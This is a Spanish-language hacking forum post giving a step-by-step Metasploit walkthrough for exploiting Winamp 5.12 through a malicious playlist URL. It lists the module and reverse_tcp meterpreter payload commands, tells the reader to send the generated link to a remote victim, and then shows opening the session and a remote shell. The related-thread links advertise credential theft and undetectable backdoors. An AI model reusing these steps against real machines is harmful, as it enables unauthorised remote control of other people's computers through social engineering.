[Metasploit] Vulnerabilidad Winamp 5.12

  • 0 Respuestas
  • 2279 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado LucaSthefano

  • *
  • Underc0der
  • Mensajes: 399
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil

[Metasploit] Vulnerabilidad Winamp 5.12

  • en: Julio 20, 2011, 01:58:25 am
Buenas, estuve revisando la lista de exploits para Navegadores (Browser) de Windows.
Cuando me tope con una de Winamp con lo que me decidí a probarla..

Vamos que es así:
Con el siguiente código usamos el Exploit
Código: You are not allowed to view links. Register or Login
use exploit/windows/browser/winamp_playlist_unc
Seleccionamos nuestro Payload de Reversa
Código: You are not allowed to view links. Register or Login
set payload windows/meterpreter/reverse_tcp
Acá seteamos nuestra IP localhost
Código: You are not allowed to view links. Register or Login
set LHOST
Acá la IP del Server (Nuestra IP)
Código: You are not allowed to view links. Register or Login
set SRVHOST
Con este seleccionamos el PUERTO de escucha
Código: You are not allowed to view links. Register or Login
set SRVPORT
Finalmente lanzamos el Exploit
Código: You are not allowed to view links. Register or Login
exploit
Nos generará una URL la cual debemos pasar al REMOTO, al abrirla si tiene Winamp, se le abrirá automáticamente con este y le dará un mensaje acerca de su lista de reproducción.

A nosotros en la Consola nos llegará un mensaje de una sesión del Meterpreter abierta..
Verificamos la sesión con el comando
Código: You are not allowed to view links. Register or Login
sessions

Viendo que en mi caso hay 1 sesión la llamo con
Código: You are not allowed to view links. Register or Login
sessions -i 1
Nos llegara el mensaje del meterpreter y con esto ya podríamos llamar la shell remota
Código: You are not allowed to view links. Register or Login
shell
Hasta aquí llegamos..

Autor: Kodeinfect
Fuente: Foro Portal Hacker
« Última modificación: Agosto 08, 2014, 08:41:55 pm por Expermicid »

 

"Escaneo Invisible" con NMAP y Metasploit

Iniciado por Stiuvert

Respuestas: 3
Vistas: 9509
Último mensaje Junio 21, 2013, 09:33:46 pm
por GhostFire
Obtener contraseña (admin) de windows con metasploit usando el módulo phish_windows_credentials

Iniciado por LionSec

Respuestas: 8
Vistas: 5800
Último mensaje Mayo 25, 2015, 02:49:25 pm
por MagoAstral
Metasploit + Metasm (Ghost Writing ASM) para crear un backdoor indetectable

Iniciado por Aryenal.Bt

Respuestas: 11
Vistas: 8737
Último mensaje Noviembre 20, 2012, 12:25:34 am
por BCKTR1X
Metasploit + Hyperion (PE Crypter) para la indetección de ejecutables maliciosos

Iniciado por Aryenal.Bt

Respuestas: 12
Vistas: 7485
Último mensaje Octubre 18, 2014, 10:17:55 am
por Snifer
[Armitage] Administrador Gráfico de Cyber Ataques para Metasploit

Iniciado por LucaSthefano

Respuestas: 2
Vistas: 4286
Último mensaje Abril 29, 2013, 07:20:08 pm
por Markuss97